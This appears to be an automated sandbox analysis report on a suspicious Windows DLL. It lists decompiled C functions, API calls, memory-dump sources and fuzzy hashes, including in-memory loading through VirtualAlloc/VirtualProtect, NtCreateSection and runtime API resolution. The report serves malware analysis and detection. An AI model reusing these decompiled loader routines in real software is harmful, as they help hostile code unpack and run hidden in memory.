              								_t89 = _t89;
              								_t86 = _t86;
              								_t66 = _a8;
              								_t55 = _t54;
              								_t106 = _t54;
              								if(_t106 == 0) {
              									goto L8;
              								} else {
              									if(_t106 < 0) {
              										_t46 = 0;
              									} else {
              										_t82 =  *(_t66 + 8);
              										E6E1C2370(_t55, _t66);
              										_t89 = _t66 + 0x10;
              										E6E1C23CB(_t89, _t66, 0);
              										_t99 = _t99 + 0xc;
              										E6E1C2467(_t82[2]);
              										 *(_t66 + 0xc) =  *_t82;
              										_t66 = 0;
              										_t86 = 0;
              										 *(_t82[2])(1);
              										goto L8;
              									}
              								}
              							}
              							goto L13;
              						}
              						L11:
              						_t46 = 1;
              					}
              				}
              				L13:
              				return _t46;
              			}























              0x6e1c2268
              0x6e1c2269
              0x6e1c226a
              0x6e1c226d
              0x6e1c226f
              0x6e1c2272
              0x6e1c2273
              0x6e1c2275
              0x6e1c2276
              0x6e1c2277
              0x6e1c227a
              0x6e1c2284
              0x6e1c2335
              0x6e1c233c
              0x6e1c2345
              0x6e1c228a
              0x6e1c228a
              0x6e1c2290
              0x6e1c2296
              0x6e1c2299
              0x6e1c229c
              0x6e1c22a0
              0x6e1c22a5
              0x6e1c22aa
              0x6e1c232a
              0x00000000
              0x6e1c22ac
              0x6e1c22ac
              0x6e1c22b8
              0x6e1c22ba
              0x6e1c2315
              0x6e1c2315
              0x6e1c231b
              0x00000000
              0x6e1c22bc
              0x6e1c22cb
              0x6e1c22cd
              0x6e1c22ce
              0x6e1c22cf
              0x6e1c22d2
              0x6e1c22d2
              0x6e1c22d4
              0x00000000
              0x6e1c22d6
              0x6e1c22d6
              0x6e1c2320
              0x6e1c22d8
              0x6e1c22d8
              0x6e1c22dc
              0x6e1c22e4
              0x6e1c22e9
              0x6e1c22ee
              0x6e1c22fa
              0x6e1c2302
              0x6e1c2309
              0x6e1c230f
              0x6e1c2313
              0x00000000
              0x6e1c2313
              0x6e1c22d6
              0x6e1c22d4
              0x00000000
              0x6e1c22ba
              0x6e1c232e
              0x6e1c232e
              0x6e1c232e
              0x6e1c22aa
              0x6e1c234a
              0x6e1c2351

              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
              • Instruction ID: fc4c44353901f2d84307cfb61ba1084ea3174adebfb3bedd7e8f94923ebf324b
              • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
              • Instruction Fuzzy Hash: B521F832900605DFCB00DFA8C8C09ABB7A9FF5D710B46A568D815CB245DB34F956C7E1
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.461300505.000000006E296000.00000040.00020000.sdmp, Offset: 6E296000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
              • Instruction ID: f5e0c9210ea3bc322c41457297fdc8de1cb85b81498ae20c17ec85757308bd18
              • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
              • Instruction Fuzzy Hash: F511E6733501059FD754CE9ADCD0E92B3DAEB89230B258066ED14CB315E776E801C7A0
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000000.00000002.461300505.000000006E296000.00000040.00020000.sdmp, Offset: 6E296000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
              • Instruction ID: 1ca1594a6c9d34dfbfef0065e495939f7c8eb7d6fd8824ac6405c0f8d13dbf9c
              • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
              • Instruction Fuzzy Hash: 3A01F53231420A8FD745CBAED894D69BBE5EBC1721B19D07EC446C7655D120E445CA20
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RtlDecodePointer.NTDLL(?), ref: 6E2235A7
              • _free.LIBCMT ref: 6E2235C0
                • Part of subcall function 6E223DA6: HeapFree.KERNEL32(00000000,00000000,?,6E22206D,00000000,00000001,00000000,?,?,?,6E21D916,6E21B7A5), ref: 6E223DBA
                • Part of subcall function 6E223DA6: GetLastError.KERNEL32(00000000,?,6E22206D,00000000,00000001,00000000,?,?,?,6E21D916,6E21B7A5), ref: 6E223DCC
              • _free.LIBCMT ref: 6E2235D3
              • _free.LIBCMT ref: 6E2235F1
              • _free.LIBCMT ref: 6E223603
              • _free.LIBCMT ref: 6E223614
              • _free.LIBCMT ref: 6E22361F
              • _free.LIBCMT ref: 6E223643
              • RtlEncodePointer.NTDLL(6E295980), ref: 6E22364A
              • _free.LIBCMT ref: 6E22365F
              • _free.LIBCMT ref: 6E223675
              • _free.LIBCMT ref: 6E22369D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
              • String ID: F)n
              • API String ID: 3064303923-455955172
              • Opcode ID: b351bee342eaa5ea5cf40aa6b6976d5ef99be533ffdf976dcf5212443e0daf59
              • Instruction ID: f2092f26939f6fe976f8b0e4216b1d686dbad9eae048902615ada0eeb8d0289f
              • Opcode Fuzzy Hash: b351bee342eaa5ea5cf40aa6b6976d5ef99be533ffdf976dcf5212443e0daf59
              • Instruction Fuzzy Hash: 4221A039A4692BCFFFA04FA6DD4C96977ABBB46736300153AE51897300C7384841CAF0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
              • String ID:
              • API String ID: 1442030790-0
              • Opcode ID: 5f1bf0b6b12f42165af58525b084f009b1f80eeb4bf0aaef3849c797b4d487a4
              • Instruction ID: 58fce7c5e625cfd19c7794b453747821f3fc3bb7f5cd63cc94dbe1269efbc1a9
              • Opcode Fuzzy Hash: 5f1bf0b6b12f42165af58525b084f009b1f80eeb4bf0aaef3849c797b4d487a4
              • Instruction Fuzzy Hash: E521C27F52861AEFE7615FE5CC05E8A7BEBFF46754B204C39E44456260EB3384008690
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
              • String ID:
              • API String ID: 3432600739-0
              • Opcode ID: 1a8b89061ca08546a97338d745b169eb0ad3987c8d74a91615036877f3643dcd
              • Instruction ID: 4a74aaa7999ea2dfe95c970c909eeb090bc5f55156b2ac6bfb2ceaba66c413d7
              • Opcode Fuzzy Hash: 1a8b89061ca08546a97338d745b169eb0ad3987c8d74a91615036877f3643dcd
              • Instruction Fuzzy Hash: 2D41EEBA81420EAFDB009FE59880BCD77EBBF04319F104839F91597180DB779686DB61
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 68%
              			E6E1C1144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
              				intOrPtr _v12;
              				struct _FILETIME* _v16;
              				short _v60;
              				struct _FILETIME* _t14;
              				intOrPtr _t15;
              				long _t18;
              				void* _t22;
              				intOrPtr _t31;
              				long _t32;
              				void* _t34;
              
              				_t31 = __edx;
              				_t14 =  &_v16;
              				GetSystemTimeAsFileTime(_t14);
              				_push(0x192);
              				_push(0x54d38000);
              				_push(_v12);
              				_push(_v16);
              				L6E1C2210();
              				_push(_t14);
              				_v16 = _t14;
              				_t15 =  *0x6e1c41d0;
              				_push(_t15 + 0x6e1c505e);
              				_push(_t15 + 0x6e1c5054);
              				_push(0x16);
              				_push( &_v60);
              				_v12 = _t31;
              				L6E1C220A();
              				_t18 = _a4;
              				if(_t18 == 0) {
              					_t18 = 0x1000;
              				}
              				_t34 = CreateFileMappingW(0xffffffff, 0x6e1c41c0, 4, 0, _t18,  &_v60);
              				if(_t34 == 0) {
              					_t32 = GetLastError();
              				} else {
              					if(_a4 != 0 || GetLastError() == 0xb7) {
              						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
              						if(_t22 == 0) {
              							_t32 = GetLastError();
              							if(_t32 != 0) {
              								goto L9;
              							}
              						} else {
              							 *_a8 = _t34;
              							 *_a12 = _t22;
              							_t32 = 0;
              						}
              					} else {
              						_t32 = 2;
              						L9:
              						CloseHandle(_t34);
              					}
              				}
              				return _t32;
              			}













              0x6e1c1144
              0x6e1c114d
              0x6e1c1151
              0x6e1c1157
              0x6e1c115c
              0x6e1c1161
              0x6e1c1164
              0x6e1c1167
              0x6e1c116c
              0x6e1c116d
              0x6e1c1170
              0x6e1c117b
              0x6e1c1182
              0x6e1c1186
              0x6e1c1188
              0x6e1c1189
              0x6e1c118c
              0x6e1c1191
              0x6e1c119b
              0x6e1c119d
              0x6e1c119d
              0x6e1c11b7
              0x6e1c11bb
              0x6e1c120b
              0x6e1c11bd
              0x6e1c11c6
              0x6e1c11dc
              0x6e1c11e4
              0x6e1c11f6
              0x6e1c11fa
              0x00000000
              0x00000000
              0x6e1c11e6
              0x6e1c11e9
              0x6e1c11ee
              0x6e1c11f0
              0x6e1c11f0
              0x6e1c11d1
              0x6e1c11d3
              0x6e1c11fc
              0x6e1c11fd
              0x6e1c11fd
              0x6e1c11c6
              0x6e1c1213

              APIs
              • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?,?), ref: 6E1C1151
              • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1C1167
              • _snwprintf.NTDLL ref: 6E1C118C
              • CreateFileMappingW.KERNEL32(000000FF,6E1C41C0,00000004,00000000,?,?), ref: 6E1C11B1
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?), ref: 6E1C11C8
              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6E1C11DC
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?), ref: 6E1C11F4
              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A), ref: 6E1C11FD
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1C156A,0000000A,?), ref: 6E1C1205
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
              • String ID:
              • API String ID: 1724014008-0
              • Opcode ID: c60262e967d796770997ba4527c8b51bef56c7ab98e41e8c78b434eff493d3c0
              • Instruction ID: 803b6c2780bf403bb96ebac22d9f8b35b69169cd61ce97a2e769f5d4ec081a58
              • Opcode Fuzzy Hash: c60262e967d796770997ba4527c8b51bef56c7ab98e41e8c78b434eff493d3c0
              • Instruction Fuzzy Hash: 0421D672640108BFDB01AFE8CC88EDE7BB9EB65B50F214165F915E7140D63C5C85EB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • __init_pointers.LIBCMT ref: 6E22212F
                • Part of subcall function 6E2237EA: RtlEncodePointer.NTDLL(00000000), ref: 6E2237ED
                • Part of subcall function 6E2237EA: __initp_misc_winsig.LIBCMT ref: 6E223808
                • Part of subcall function 6E2237EA: GetModuleHandleW.KERNEL32(6E1C30D8,?,6E293798,00000008,6E294008,6E29354C,?,00000001), ref: 6E225B99
              • __mtinitlocks.LIBCMT ref: 6E222134
              • __mtterm.LIBCMT ref: 6E22213D
                • Part of subcall function 6E2221A5: RtlDeleteCriticalSection.NTDLL(?), ref: 6E228218
                • Part of subcall function 6E2221A5: _free.LIBCMT ref: 6E22821F
                • Part of subcall function 6E2221A5: RtlDeleteCriticalSection.NTDLL(6E294D40), ref: 6E228241
              • __calloc_crt.LIBCMT ref: 6E222162
              • __initptd.LIBCMT ref: 6E222184
              • GetCurrentThreadId.KERNEL32 ref: 6E22218B
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
              • String ID:
              • API String ID: 1551663144-0
              • Opcode ID: 3b49f610130fdca1db4e76172ce1afc97b02853db3e76f9baa70e81cbd1daa23
              • Instruction ID: d565c042dde21decc911553a71a6fc81b6dc8b151065f299e509da5fd8bd05a5
              • Opcode Fuzzy Hash: 3b49f610130fdca1db4e76172ce1afc97b02853db3e76f9baa70e81cbd1daa23
              • Instruction Fuzzy Hash: F0F0F67702D71B2FF664AAF46C05ACB2A8BAF02639B200A39F564DA0D1FF128041D160
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6E1C1060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
              				intOrPtr _v8;
              				_Unknown_base(*)()* _t29;
              				_Unknown_base(*)()* _t33;
              				_Unknown_base(*)()* _t36;
              				_Unknown_base(*)()* _t39;
              				_Unknown_base(*)()* _t42;
              				intOrPtr _t46;
              				struct HINSTANCE__* _t50;
              				intOrPtr _t56;
              
              				_t56 = E6E1C1B58(0x20);
              				if(_t56 == 0) {
              					_v8 = 8;
              				} else {
              					_t50 = GetModuleHandleA( *0x6e1c41d0 + 0x6e1c5014);
              					_v8 = 0x7f;
              					_t29 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c50e1);
              					 *(_t56 + 0xc) = _t29;
              					if(_t29 == 0) {
              						L8:
              						E6E1C142F(_t56);
              					} else {
              						_t33 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c50f1);
              						 *(_t56 + 0x10) = _t33;
              						if(_t33 == 0) {
              							goto L8;
              						} else {
              							_t36 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c5104);
              							 *(_t56 + 0x14) = _t36;
              							if(_t36 == 0) {
              								goto L8;
              							} else {
              								_t39 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c5119);
              								 *(_t56 + 0x18) = _t39;
              								if(_t39 == 0) {
              									goto L8;
              								} else {
              									_t42 = GetProcAddress(_t50,  *0x6e1c41d0 + 0x6e1c512f);
              									 *(_t56 + 0x1c) = _t42;
              									if(_t42 == 0) {
              										goto L8;
              									} else {
              										 *((intOrPtr*)(_t56 + 8)) = _a8;
              										 *((intOrPtr*)(_t56 + 4)) = _a4;
              										_t46 = E6E1C1B9C(_t56, _a12);
              										_v8 = _t46;
              										if(_t46 != 0) {
              											goto L8;
              										} else {
              											 *_a16 = _t56;
              										}
              									}
              								}
              							}
              						}
              					}
              				}
              				return _v8;
              			}












              0x6e1c106e
              0x6e1c1072
              0x6e1c1133
              0x6e1c1078
              0x6e1c1090
              0x6e1c109f
              0x6e1c10a6
              0x6e1c10aa
              0x6e1c10ad
              0x6e1c112b
              0x6e1c112c
              0x6e1c10af
              0x6e1c10bc
              0x6e1c10c0
              0x6e1c10c3
              0x00000000
              0x6e1c10c5
              0x6e1c10d2
              0x6e1c10d6
              0x6e1c10d9
              0x00000000
              0x6e1c10db
              0x6e1c10e8
              0x6e1c10ec
              0x6e1c10ef
              0x00000000
              0x6e1c10f1
              0x6e1c10fe
              0x6e1c1102
              0x6e1c1105
              0x00000000
              0x6e1c1107
              0x6e1c110d
              0x6e1c1113
              0x6e1c1118
              0x6e1c111f
              0x6e1c1122
              0x00000000
              0x6e1c1124
              0x6e1c1127
              0x6e1c1127
              0x6e1c1122
              0x6e1c1105
              0x6e1c10ef
              0x6e1c10d9
              0x6e1c10c3
              0x6e1c10ad
              0x6e1c1141

              APIs
                • Part of subcall function 6E1C1B58: HeapAlloc.KERNEL32(00000000,?,6E1C1702,?,00000000,00000000,?,?,?,6E1C1CE6), ref: 6E1C1B64
              • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E1C1480,?,?,?,?,00000002,00000000,?,?), ref: 6E1C1084
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10A6
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10BC
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10D2
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10E8
              • GetProcAddress.KERNEL32(00000000,?), ref: 6E1C10FE
                • Part of subcall function 6E1C1B9C: memset.NTDLL ref: 6E1C1C1B
              Memory Dump Source
              • Source File: 00000000.00000002.460436552.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000000.00000002.460428068.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460462599.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.460478829.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000000.00000002.460501116.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AddressProc$AllocHandleHeapModulememset
              • String ID:
              • API String ID: 426539879-0
              • Opcode ID: 6c491f257b895694d05b118b3e60ec4a510c9f5036a9515af6d925cca7394367
              • Instruction ID: c55f6172b4d60dac4960483c3967355f82887751ae68e4afe54efec6a1ecb65d
              • Opcode Fuzzy Hash: 6c491f257b895694d05b118b3e60ec4a510c9f5036a9515af6d925cca7394367
              • Instruction Fuzzy Hash: B021A5F160060B9FDB40EFA9DC84D5A7BFCFB65E44B104415E989D7201E33CE906AB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • FindFirstChangeNotificationA.KERNEL32 ref: 6E23EB7D
              • GetCurrentDirectoryA.KERNEL32(00000404,6E2A9BC0), ref: 6E23EBDF
              • GetEnvironmentVariableA.KERNEL32(6E1C8140,6E2AA1E8,00000404), ref: 6E23ECD9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: ChangeCurrentDirectoryEnvironmentFindFirstNotificationVariable
              • String ID: 3$PR)n
              • API String ID: 2016254915-1293188012
              • Opcode ID: 6434ee782b76773d494697785d01e23527eadc4414a76b44a4d68fde20b57dc6
              • Instruction ID: f6d5d697a6d37fcb63d56ea0a24ecb194e354d0057a3c764feded77284319f67
              • Opcode Fuzzy Hash: 6434ee782b76773d494697785d01e23527eadc4414a76b44a4d68fde20b57dc6
              • Instruction Fuzzy Hash: D471AEB1B847168FDB04CFAAC89861977A3FB8631AF549A3ED81587344D3749808CF61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: _wcsnlen
              • String ID: U
              • API String ID: 3628947076-3372436214
              • Opcode ID: a130cd58009ec03e88894f727ffc434a8ab414368446440ebed0c4a75e4c71a3
              • Instruction ID: 706025769fbe77e4a28b6b92e08f17182ff787be2a26e52ff9da0bbcc658df2e
              • Opcode Fuzzy Hash: a130cd58009ec03e88894f727ffc434a8ab414368446440ebed0c4a75e4c71a3
              • Instruction Fuzzy Hash: E6213BB362810DAFEB448AE9AC45FFA33AEDB45761F504535F908C7180FB73DA108690
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • _malloc.LIBCMT ref: 6E22F774
                • Part of subcall function 6E224E76: __FF_MSGBANNER.LIBCMT ref: 6E224E8D
                • Part of subcall function 6E224E76: __NMSG_WRITE.LIBCMT ref: 6E224E94
                • Part of subcall function 6E224E76: RtlAllocateHeap.NTDLL(6E2959B8,00000000,00000001), ref: 6E224EB9
              • _free.LIBCMT ref: 6E22F787
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: AllocateHeap_free_malloc
              • String ID:
              • API String ID: 1020059152-0
              • Opcode ID: a21a2f0f7ca1c9cbce24ee946850e3ce78982631e02ebd316f37c6ad7520694d
              • Instruction ID: 2a10e2b7a5c32affc8b1445ad24871128c017ce3979bc7d6f16a9dc870975e25
              • Opcode Fuzzy Hash: a21a2f0f7ca1c9cbce24ee946850e3ce78982631e02ebd316f37c6ad7520694d
              • Instruction Fuzzy Hash: D011CA3691461F9FFF611FF89854A8B37DBAF05379F304936F908AA180EB74848086E4
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 6E221FF5: __getptd_noexit.LIBCMT ref: 6E221FF6
                • Part of subcall function 6E221FF5: __amsg_exit.LIBCMT ref: 6E222003
              • __amsg_exit.LIBCMT ref: 6E22195F
              • __lock.LIBCMT ref: 6E22196F
              • _free.LIBCMT ref: 6E22199C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: __amsg_exit$__getptd_noexit__lock_free
              • String ID: F)n
              • API String ID: 3054295789-455955172
              • Opcode ID: bb6dae0eb77d9adf97ddc62b227f6f3178c5c820fc4a1a78fe88f3b0a8369f1e
              • Instruction ID: 28a04ea06208bf68ecd72fe695767930c2cb6358b5aa497ff02029938896fdf2
              • Opcode Fuzzy Hash: bb6dae0eb77d9adf97ddc62b227f6f3178c5c820fc4a1a78fe88f3b0a8369f1e
              • Instruction Fuzzy Hash: 2A11A535D01A6F9FCB509FEA8440F8DB3E67F05B21B150529D474A7280CB395986CFD5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E23CB95
              • __isleadbyte_l.LIBCMT ref: 6E23CBC3
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E23CBF1
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E23CC27
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
              • String ID:
              • API String ID: 3058430110-0
              • Opcode ID: 1909cc19a61a1a17949f628dfebf427fb23bf0321f6290863e8d73ee3b8edeb9
              • Instruction ID: a1145c35da36b566790ba9e4a56cec1f720db70330db6cdb6ebd5ff284bac845
              • Opcode Fuzzy Hash: 1909cc19a61a1a17949f628dfebf427fb23bf0321f6290863e8d73ee3b8edeb9
              • Instruction Fuzzy Hash: 7831057050427FAFDB118EB5C846BAA7BA7FF01721F254829E4618B190E731D450DFA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • ___BuildCatchObject.LIBCMT ref: 6E22633B
                • Part of subcall function 6E226A30: ___BuildCatchObjectHelper.LIBCMT ref: 6E226A62
                • Part of subcall function 6E226A30: ___AdjustPointer.LIBCMT ref: 6E226A79
              • _UnwindNestedFrames.LIBCMT ref: 6E226352
              • ___FrameUnwindToState.LIBCMT ref: 6E226364
              • CallCatchBlock.LIBCMT ref: 6E226388
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
              • String ID:
              • API String ID: 2901542994-0
              • Opcode ID: f043bd799ec794dcdbd96a67b851ac0f7d1579d04b3c6502d4da18ff498105f8
              • Instruction ID: ee0afe558ddf0337d7cfce0a731354002d2884e81c01789a62bf030c85e24bd3
              • Opcode Fuzzy Hash: f043bd799ec794dcdbd96a67b851ac0f7d1579d04b3c6502d4da18ff498105f8
              • Instruction Fuzzy Hash: B301173201014DEFCF025F95DC40EDA7BBAFF48B54F058424FA1866120C372E5619FA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.460545708.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
              • String ID:
              • API String ID: 3016257755-0
              • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
              • Instruction ID: 494249a2afee8a6f63858aff78b1f8147ea0c4a96904d87ad01eff588c94aa35
              • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
              • Instruction Fuzzy Hash: BF01333644828EBFCF125EC4CC11DEE3F27BB19355B458925FE28981A0C336D6B1AB81
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              APIs
              • VirtualAlloc.KERNELBASE(00000000,000006AB,00003000,00000040,000006AB,6E296BE0), ref: 6E297245
              • VirtualAlloc.KERNEL32(00000000,00000314,00003000,00000040,6E296C41), ref: 6E29727C
              • VirtualAlloc.KERNEL32(00000000,0000EC31,00003000,00000040), ref: 6E2972DC
              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E297312
              • VirtualProtect.KERNEL32(6E1C0000,00000000,00000004,6E297167), ref: 6E297417
              • VirtualProtect.KERNEL32(6E1C0000,00001000,00000004,6E297167), ref: 6E29743E
              • VirtualProtect.KERNEL32(00000000,?,00000002,6E297167), ref: 6E29750B
              • VirtualProtect.KERNEL32(00000000,?,00000002,6E297167,?), ref: 6E297561
              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E29757D
              Memory Dump Source
              • Source File: 00000004.00000002.464772699.000000006E296000.00000040.00020000.sdmp, Offset: 6E296000, based on PE: false
              Similarity
              • API ID: Virtual$Protect$Alloc$Free
              • String ID:
              • API String ID: 2574235972-0
              • Opcode ID: 809c7055cc761c65bd0d80cc4914a0d3f47182814d01b9dbc598a8231fe2a8b3
              • Instruction ID: 1680e39e4f1abc5d00b3de2304b19bf1a97eaed0b398433b3e31cdd07c0bbce8
              • Opcode Fuzzy Hash: 809c7055cc761c65bd0d80cc4914a0d3f47182814d01b9dbc598a8231fe2a8b3
              • Instruction Fuzzy Hash: D2D19D36500203AFDB16CF55C8A0B5177A6FF89310B0B4598ED1AEF3DAD771A80ADB64
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID:
              • String ID: PR)n$T$W
              • API String ID: 0-3270365719
              • Opcode ID: e951073df6e2001df1faf367814b67fef01e31d65a272cf1ce0837f7aa57a745
              • Instruction ID: 3d9fb1e5917b4f8cb47394d87f31f94bc9fe20393a7096d78658644b2affa550
              • Opcode Fuzzy Hash: e951073df6e2001df1faf367814b67fef01e31d65a272cf1ce0837f7aa57a745
              • Instruction Fuzzy Hash: D092A0B1A597528FDB04CFBAD49825ABBE3BB9A306F24592EE494C3344D3348449CF71
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 72%
              			E6E1C1B9C(intOrPtr* __eax, void** _a4) {
              				int _v12;
              				void* _v16;
              				void* _v20;
              				void* _v24;
              				int _v28;
              				int _v32;
              				intOrPtr _v36;
              				int _v40;
              				int _v44;
              				void* _v48;
              				void* __esi;
              				long _t34;
              				void* _t39;
              				void* _t47;
              				intOrPtr* _t48;
              
              				_t48 = __eax;
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				_v24 =  *((intOrPtr*)(__eax + 4));
              				_v16 = 0;
              				_v12 = 0;
              				_v48 = 0x18;
              				_v44 = 0;
              				_v36 = 0x40;
              				_v40 = 0;
              				_v32 = 0;
              				_v28 = 0;
              				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
              				if(_t34 < 0) {
              					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
              				} else {
              					 *_t48 = _v16;
              					_t39 = E6E1C1EC7(_t48,  &_v12); // executed
              					_t47 = _t39;
              					if(_t47 != 0) {
              						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
              					} else {
              						memset(_v12, 0, _v24);
              						 *_a4 = _v12;
              					}
              				}
              				return _t47;
              			}


















              0x6e1c1ba5
              0x6e1c1bac
              0x6e1c1bad
              0x6e1c1bae
